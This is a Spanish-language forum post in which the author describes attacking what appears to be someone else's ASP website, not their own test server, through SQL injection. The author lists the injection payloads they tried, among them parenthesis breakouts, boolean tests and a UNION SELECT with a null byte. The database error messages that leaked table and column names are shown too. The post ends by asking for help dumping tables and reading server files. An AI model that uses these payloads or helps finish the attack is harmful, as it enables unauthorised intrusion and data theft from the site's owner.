El caso es que he encontrado una página vulnerable a la Inyección SQL, el problema es muy gordo, y es que estoy bastante perdido con los comandos de este servidor.
Empiezo escribiendo por donde le entré:
Código:
programa.asp?NUMERO=48796543'%20AND%201=1
El valor de NUMERO es existente, pero me devolvió lo siguiente:
Código:
Microsoft JET Database Engine error '80040e14'
Syntax error in string in query epresionje '(((tabla.NUMERO) = '48796543' AND 1=1'))'.
programa.asp, line 214
Ahí me doy cuenta de los paréntesis. Están mal colocados. Por tanto prosigo a cambiarlos de lugar:
Código:
programa.asp?NUMERO=48796543'))%20AND%201=(('1
Y devuelve:
Código:
Microsoft JET Database Engine error '80040e07'
Data type mismatch in criteria epresionje.
programa.asp, line 214
Así también me da error, pero como en la primera consulta hemos conseguido la tabla y la columna a la que accede, intento obtener algún resultado:
Código:
programa.asp?NUMERO=48796543'))%20UNION%20SELECT%20*%20FROM%20tabla%20WHERE%20((NUMEROS='48796543%00
A mi entender, escribí esta consulta en la que debería de aparecer un valor verdadero si existe, ¿no?..... Pues no.... jeje:
Código:
Microsoft JET Database Engine error '80040e14'
The number of columns in the two selected tables or queries of a union query do not match.
programa.asp, line 214
En fin. He probado muchas consultas más, y estoy un poco harto. Empecé con mi servidor local y haciéndome prácticas de SQL Injection y Blind SQL Injection, y satisfactoriamente conseguido. Ahora con este, no se obtener tablas o si se pueden conseguir ficheros del servidor (tipo en el Blind SQL Injection con la base de datos MySQL)...
Espero que me echéis una manita...
¡Un saludo!